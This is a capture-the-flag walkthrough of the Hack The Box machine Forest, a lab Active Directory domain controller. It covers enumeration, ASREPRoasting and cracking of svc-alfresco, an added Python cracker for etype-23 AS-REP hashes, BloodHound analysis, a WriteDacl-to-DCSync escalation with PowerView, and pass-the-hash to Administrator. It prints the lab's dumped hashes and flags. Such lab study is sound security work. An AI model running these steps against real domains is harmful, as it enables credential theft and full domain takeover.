Forest

$ nmap -p- -T4 -A 10.10.10.161
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Simple DNS Plus
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2021-07-14 11:29:58Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49684/tcp open  msrpc        Microsoft Windows RPC
49706/tcp open  msrpc        Microsoft Windows RPC
49918/tcp open  msrpc        Microsoft Windows RPC
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2h39m16s, deviation: 4h02m31s, median: 19m15s
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: FOREST
|   NetBIOS computer name: FOREST\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: FOREST.htb.local
|_  System time: 2021-07-14T04:30:50-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-14T11:30:47
|_  start_date: 2021-07-14T05:24:20
$ echo 10.10.10.161 forest.htb htb.local |sudo tee -a /etc/hosts
$ smbclient -N -L 10.10.10.161
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
SMB1 disabled -- no workgroup available
$ nslookup 
> server 10.10.10.161
Default server: 10.10.10.161
Address: 10.10.10.161#53
> htb.local
Server:         10.10.10.161
Address:        10.10.10.161#53

Name:   htb.local
Address: 10.10.10.16
$ dig axfr htb.local @10.10.10.161

; <<>> DiG 9.16.15-Debian <<>> axfr htb.local @10.10.10.161
;; global options: +cmd
; Transfer failed.
$ rpcclient 10.10.10.161 -U '' -N
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
user:[user] rid:[0x1db1]
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
rpcclient $> 
rpcclient $> enumdomains
name:[HTB] idx:[0x0]
name:[Builtin] idx:[0x0]
rpcclient $> querydomaininfo
command not found: querydomaininfo
rpcclient $> querydominfo
Domain:         HTB
Server:
Comment:
Total Users:    106
Total Groups:   0
Total Aliases:  0
Sequence No:    1
Force Logoff:   -1
Domain Server State:    0x1
Server Role:    ROLE_DOMAIN_PDC
Unknown 3:      0x1
rpcclient $> 
$ nullinux -shares 10.10.10.161
[*] Enumerating Shares for: 10.10.10.161
        Shares                     Comments
   -------------------------------------------
   
[-] No Shares Detected
$ nullinux -users 10.10.10.161
[*] Enumerating Domain Information for: 10.10.10.161
[+] Domain Name: HTB
[+] Domain SID: S-1-5-21-3072663084-364016917-1341370565

[*] Enumerating querydispinfo for: 10.10.10.161
    $331000-VK4ADACQNUCA
    Administrator
    andy
    DefaultAccount
    Guest
    HealthMailbox0659cc1
    HealthMailbox670628e
    HealthMailbox6ded678
    HealthMailbox7108a4e
    HealthMailbox83d6781
    HealthMailbox968e74d
    HealthMailboxb01ac64
    HealthMailboxc0a90c9
    HealthMailboxc3d7722
    HealthMailboxfc9daad
    HealthMailboxfd87238
    krbtgt
    lucinda
    mark
    santi
    sebastien
    SM_1b41c9286325456bb
    SM_1ffab36a2f5f479cb
    SM_2c8eef0a09b545acb
    SM_681f53d4942840e18
    SM_75a538d3025e4db9a
    SM_7c96b981967141ebb
    SM_9b69f1b9d2cc45549
    SM_c75ee099d0a64c91b
    SM_ca8c2ed5bdab4dc9b
    svc-alfresco
    user

[*] Enumerating enumdomusers for: 10.10.10.161
    Administrator
    Guest
    krbtgt
    DefaultAccount
    $331000-VK4ADACQNUCA
    SM_2c8eef0a09b545acb
    SM_ca8c2ed5bdab4dc9b
    SM_75a538d3025e4db9a
    SM_681f53d4942840e18
    SM_1b41c9286325456bb
    SM_9b69f1b9d2cc45549
    SM_7c96b981967141ebb
    SM_c75ee099d0a64c91b
    SM_1ffab36a2f5f479cb
    HealthMailboxc3d7722
    HealthMailboxfc9daad
    HealthMailboxc0a90c9
    HealthMailbox670628e
    HealthMailbox968e74d
    HealthMailbox6ded678
    HealthMailbox83d6781
    HealthMailboxfd87238
    HealthMailboxb01ac64
    HealthMailbox7108a4e
    HealthMailbox0659cc1
    sebastien
    lucinda
    svc-alfresco
    andy
    mark
    santi
    user

[*] Enumerating LSA for: 10.10.10.161

[*] Performing RID Cycling for: 10.10.10.161

[*] Testing 10.10.10.161 for Known Users

[*] Enumerating Group Memberships for: 10.10.10.161
[+] Group: Enterprise Read-only Domain Controllers
[+] Group: Domain Admins
[+] Group: Domain Users
[+] Group: Domain Guests
[+] Group: Domain Computers
[+] Group: Domain Controllers
[+] Group: Schema Admins
[+] Group: Enterprise Admins
[+] Group: Group Policy Creator Owners
[+] Group: Read-only Domain Controllers
[+] Group: Cloneable Domain Controllers
[+] Group: Protected Users
[+] Group: Key Admins
[+] Group: Enterprise Key Admins
[+] Group: DnsUpdateProxy
[+] Group: Organization Management
[+] Group: Recipient Management
[+] Group: View-Only Organization Management
[+] Group: Public Folder Management
[+] Group: UM Management
[+] Group: Help Desk
[+] Group: Records Management
[+] Group: Discovery Management
[+] Group: Server Management
[+] Group: Delegated Setup
[+] Group: Hygiene Management
[+] Group: Compliance Management
[+] Group: Security Reader
[+] Group: Security Administrator
[+] Group: Exchange Servers
[+] Group: Exchange Trusted Subsystem
[+] Group: Managed Availability Servers
[+] Group: Exchange Windows Permissions
[+] Group: ExchangeLegacyInterop
[+] Group: $D31000-NSEL5BRJ63V7
[+] Group: Service Accounts
[+] Group: Privileged IT Accounts
[+] Group: test
$ ldapsearch -h 10.10.10.161 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingContexts: DC=htb,DC=local
namingContexts: CN=Configuration,DC=htb,DC=local
namingContexts: CN=Schema,CN=Configuration,DC=htb,DC=local
namingContexts: DC=DomainDnsZones,DC=htb,DC=local
namingContexts: DC=ForestDnsZones,DC=htb,DC=local

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
Exploitation — Kerberos ASREPRoast
Use Impacket's GetNPUsers.py to find accounts that have the DONT_REQUIRE_PREAUTH flag set in userAccountControl. With Kerberos pre-authentication disabled, the KDC answers an AS-REQ for that account without first demanding a timestamp encrypted under the user's key, so anyone who knows the username can request a ticket on its behalf. The AS-REP the DC sends back contains a part encrypted with a key derived from the user's password (for RC4-HMAC, etype 23, that key is the NT hash), and that blob can be taken offline and brute-forced against a wordlist to recover the password. The users.txt passed to the tool holds the non-service accounts enumerated above.
$ GetNPUsers.py htb.local/ -no-pass -usersfile users.txt
[-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$svc-alfresco@HTB.LOCAL:bdb2015cc05e7bdf76b9b07529987c0c$9c1035a6f30dd20d92f401c27ca9dfbf6eeab8648314763ca13da31e343e4a9bac28a8991c51c0854add82dcc64343234ec1822eb53cd323d6e6f3015a00e6f0fa7e065a166558f15f88210964d8b5394cb72f747c32e4779886a23f70104ac07819b8af7444cbf19bfc624e9143351c238b104dabe403aa6cc4fa5c997e6d4ea2f27e14ab594c71c75cbb239e1d69267ca7222c33a8c308d7b13f95c85f8d997f8620f4ff5076407781bde0ba4baa6fed74d4500a130cb39a94b83bc6f3b65801e89d795ae756bfd7a0d271d3095511c9cc4a37b940a91519a8189944afe38e71e9ff3a5542
[-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User user doesn't have UF_DONT_REQUIRE_PREAUTH set
kali@kali:~/0.htb/machines/Forest161$ john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 128/128 AVX 4x])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
s3rvice          ($krb5asrep$23$svc-alfresco@HTB.LOCAL)
1g 0:00:00:03 DONE (2021-07-14 10:13) 0.3333g/s 1361Kp/s 1361Kc/s 1361KC/s s401447401447401447..s3r2s1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
kali@kali:~/0.htb/machines/Forest161$ john --show hash.txt 
$krb5asrep$23$svc-alfresco@HTB.LOCAL:s3rvice
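The reason john finishes in three seconds is that everything it needs is in the one line GetNPUsers.py printed. The block below is an added example, not code from the write-up or from Impacket/John: it re-implements, for etype 23, the arithmetic a cracker applies to a `$krb5asrep$23$` line (candidate password to NT hash, RC4-HMAC sub-keys for key usage 8, decrypt, accept when the HMAC-MD5 checksum verifies). MD4 is written out because OpenSSL 3 hides it from hashlib on many systems. The sample AS-REP is constructed locally with a fixed confounder and placeholder plaintext; the only page-derived value is the svc-alfresco principal name, and the page's own hash line is only parsed here, not cracked.

```python
# Added example (not from the write-up): the arithmetic John/hashcat apply to a
# $krb5asrep$23$ line. candidate -> NT hash (MD4 of UTF-16LE) -> RC4-HMAC sub-keys
# for key usage 8 (AS-REP enc-part, RFC 4120 s7.5.1) -> decrypt -> checksum check.
import hmac
import struct

ASREP_KEY_USAGE = 8  # encrypted part of the AS-REP, keyed with the client's key

def _lrot(x, n):
    return ((x << n) | (x >> (32 - n))) & 0xFFFFFFFF

def md4(msg: bytes) -> bytes:
    """RFC 1320 MD4, the only primitive behind an NT hash (OpenSSL 3 often lacks it)."""
    mask = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    msg = msg + b"\x80" + b"\x00" * ((55 - len(msg)) % 64) + struct.pack("<Q", len(msg) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = h
        for i in range(16):  # round 1
            a = _lrot((a + F(b, c, d) + X[i]) & mask, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):  # round 2
            a = _lrot((a + G(b, c, d) + X[(i % 4) * 4 + i // 4] + 0x5A827999) & mask, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i, k in enumerate((0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)):  # round 3
            a = _lrot((a + H(b, c, d) + X[k] + 0x6ED9EBA1) & mask, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        h = [(v + w) & mask for v, w in zip(h, (a, b, c, d))]
    return struct.pack("<4I", *h)

def rc4(key: bytes, data: bytes) -> bytes:
    S, j = list(range(256)), 0
    for i in range(256):  # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation, XORed onto the data
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, "md5").digest()

def ntlm_hash(password: str) -> bytes:
    """RC4-HMAC (etype 23) uses the NT hash itself as the long-term Kerberos key."""
    return md4(password.encode("utf-16le"))

def rc4_hmac_encrypt(key, usage, plaintext, confounder):
    """RFC 4757 s5: checksum || RC4(K3, confounder || plaintext)."""
    k1 = hmac_md5(key, struct.pack("<I", usage))
    checksum = hmac_md5(k1, confounder + plaintext)
    return checksum + rc4(hmac_md5(k1, checksum), confounder + plaintext)

def rc4_hmac_decrypt(key, usage, blob):
    """Plaintext minus the 8-byte confounder, or None if the checksum rejects the key."""
    checksum, ciphertext = blob[:16], blob[16:]
    k1 = hmac_md5(key, struct.pack("<I", usage))
    data = rc4(hmac_md5(k1, checksum), ciphertext)
    return data[8:] if hmac.compare_digest(hmac_md5(k1, data), checksum) else None

def parse_krb5asrep_line(line: str) -> dict:
    """$krb5asrep$<etype>$<user>@<REALM>:<checksum hex>$<edata hex> (John/hashcat format)."""
    _, tag, etype, rest = line.strip().split("$", 3)
    if tag != "krb5asrep":
        raise ValueError("not an AS-REP line")
    principal, material = rest.split(":", 1)
    checksum, edata = material.split("$", 1)
    return {"etype": int(etype), "principal": principal,
            "checksum": bytes.fromhex(checksum), "edata": bytes.fromhex(edata)}

def crack_asrep(line: str, wordlist):
    """Return the first candidate that makes the AS-REP checksum verify, else None."""
    h = parse_krb5asrep_line(line)
    if h["etype"] != 23:
        raise ValueError("only etype 23 (RC4-HMAC) is handled here")
    for candidate in wordlist:
        if rc4_hmac_decrypt(ntlm_hash(candidate), ASREP_KEY_USAGE, h["checksum"] + h["edata"]) is not None:
            return candidate
    return None

def build_krb5asrep_line(principal, password, plaintext, confounder):
    """Constructed sample: the line GetNPUsers.py would print had the KDC encrypted
    `plaintext` under this password (fixed confounder only so the output is stable)."""
    blob = rc4_hmac_encrypt(ntlm_hash(password), ASREP_KEY_USAGE, plaintext, confounder)
    return f"$krb5asrep$23${principal}:{blob[:16].hex()}${blob[16:].hex()}"

if __name__ == "__main__":
    # A real enc-part is a DER EncASRepPart (APPLICATION 25, first byte 0x79);
    # the bytes after that tag here are placeholder, not a real ticket.
    sample = build_krb5asrep_line("svc-alfresco@HTB.LOCAL", "s3rvice",
                                  b"\x79" + b"constructed EncASRepPart", bytes(range(8)))
    print(sample)
    print(crack_asrep(sample, ["password", "123456", "s3rvice"]))  # s3rvice
```

Two things the code makes concrete: no salt or iteration count is involved for etype 23 (one MD4 plus three HMAC-MD5 and one RC4 per guess, hence the ~1.3M candidates/s john reported), and the first 16 bytes of the blob are an HMAC of the plaintext, so every wrong guess is rejected offline with zero traffic to the DC. AES etypes (17/18) add PBKDF2 with the salt, which is why john lists them separately in the format line.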
kali@kali:~/0.htb/machines/Forest161$ smbmap -H 10.10.10.161 -u svc-alfresco -p s3rvice
[+] IP: 10.10.10.161:445        Name: forest.htb                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
kali@kali:~/0.htb/machines/Forest161$ 
$ evil-winrm -i 10.10.10.161 -u svc-alfresco -p s3rvice

Evil-WinRM shell v2.4

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 

*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> type user.txt
e5e4e47ae7022664cda6eb013fb0d9ed
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> 

    Directory: C:\Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/18/2019  10:09 AM                Administrator
d-r---       11/20/2016   6:39 PM                Public
d-----        9/22/2019   3:29 PM                sebastien
d-----        9/22/2019   4:02 PM                svc-alfresco
*Evil-WinRM* PS C:\> net user
*Evil-WinRM* PS C:\> net user administrator
*Evil-WinRM* PS C:\> net user sebastien
*Evil-WinRM* PS C:\Users\svc-alfresco\Downloads> upload winpeas.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Downloads> ./winpeas.exe >output.txt
Enumerate Active Directory with SharpHound, the BloodHound collector, to gather group membership, ACL, session and trust data from the target.
*Evil-WinRM* PS C:\Users\svc-alfresco\Downloads> upload SharpHound.exe
Info: Uploading SharpHound.exe to C:\Users\svc-alfresco\Downloads\SharpHound.exe
*Evil-WinRM* PS C:\Users\svc-alfresco\Downloads> .\SharpHound.exe
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain HTB.LOCAL using path CN=Schema,CN=Configuration,DC=htb,DC=local
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 21 MB RAM
Status: 125 objects finished (+125 62.5)/s -- Using 28 MB RAM
Enumeration finished in 00:00:02.4767994
Compressing data to .\20210714090327_BloodHound.zip
You can upload this file directly to the UI
*Evil-WinRM* PS C:\Users\svc-alfresco\Downloads> download 20210714090327_BloodHound.zip
Info: Downloading C:\Users\svc-alfresco\Downloads\20210714090327_BloodHound.zip to 20210714090327_BloodHound.zip
kali@kali:~/0.htb/machines/Forest161$ sudo neo4j start
kali@kali:~/0.htb/machines/Forest161$ bloodhound
Drag the zip into the BloodHound GUI to import it, then run the pre-built query "Find Shortest Paths to Domain Admins" from the Analysis tab. Mark svc-alfresco as owned for convenience.
The path shows that svc-alfresco is a member of Account Operators through nested group membership. Members of Account Operators have GenericAll over the EXCHANGE WINDOWS PERMISSIONS group, which amounts to full control, and EXCHANGE WINDOWS PERMISSIONS in turn has WriteDacl on the HTB.LOCAL domain object. Account Operators is also what lets a member create domain accounts and change the membership of non-protected groups such as EXCHANGE WINDOWS PERMISSIONS, which the escalation below relies on.
Right-click the WriteDacl edge and choose "Help"; BloodHound explains how to abuse the privilege. WriteDacl on the domain object means we can rewrite its DACL and grant a principal we control any right on that object, including the replication rights that DCSync requires. The "Abuse Info" tab gives the PowerView commands for granting DCSync:
'''
To abuse WriteDacl to a domain object, you may grant yourself the DcSync privileges.
You may need to authenticate to the Domain Controller as a member of EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL if you are not running a process as a member. To do this in conjunction with Add-DomainObjectAcl, first create a PSCredential object (these examples come from the PowerView help documentation):
$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)
Then, use Add-DomainObjectAcl, optionally specifying $Cred if you are not already running a process as EXCHANGE WINDOWS PERMISSIONS@HTB.LOCAL:
Add-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync
Once you have granted yourself this privilege, you may use the mimikatz dcsync function to dcsync the password of arbitrary principals on the domain
lsadump::dcsync /domain:testlab.local /user:Administrator
Cleanup can be done using the Remove-DomainObjectAcl function:
Remove-DomainObjectAcl -Credential $Cred -TargetIdentity testlab.local -Rights DCSync
'''
With the DS-Replication-Get-Changes and DS-Replication-Get-Changes-All rights on the domain object, a principal can use the DRSUAPI replication protocol to request account secrets from the DC exactly as a replication partner would. This is the DCSync attack: every password hash stored in the NTDS.dit database, including krbtgt and Administrator, is handed over without ever touching the file on disk or needing local administrator rights on the DC.
Privilege Escalation — DCSync attack
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
Download PowerView.ps1 from the URL above and, once uploaded, dot-source it so its functions are available in the session.
*Evil-WinRM* PS C:\Users\svc-alfresco\Downloads> . .\PowerView.ps1
Because svc-alfresco is in Account Operators, it can create a new domain user and add it to EXCHANGE WINDOWS PERMISSIONS. Adding svc-alfresco itself to the group would not help the current session, since group membership is only evaluated at logon; a fresh account whose credential is passed to Add-DomainObjectAcl sidesteps that.
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net user hacker hacker12345 /add
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> net group "exchange windows permissions" /add hacker

*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $SecPassword = ConvertTo-SecureString 'hacker12345' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> $Cred = New-Object System.Management.Automation.PSCredential('htb\hacker', $SecPassword)
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> Add-DomainObjectAcl -TargetIdentity "DC=htb,DC=local" -PrincipalIdentity hacker -Credential $Cred -Rights DCSync
kali@kali:~/0.htb/machines/Forest161$ secretsdump.py hacker:hacker12345@10.10.10.161
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
$ evil-winrm -i 10.10.10.161 -u administrator -H 32693b11e6aa90eb43d32c72a07ceea6
*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
f048153f202bbb2f82622b04d79129cc
*Evil-WinRM* PS C:\Users\Administrator\Documents> 
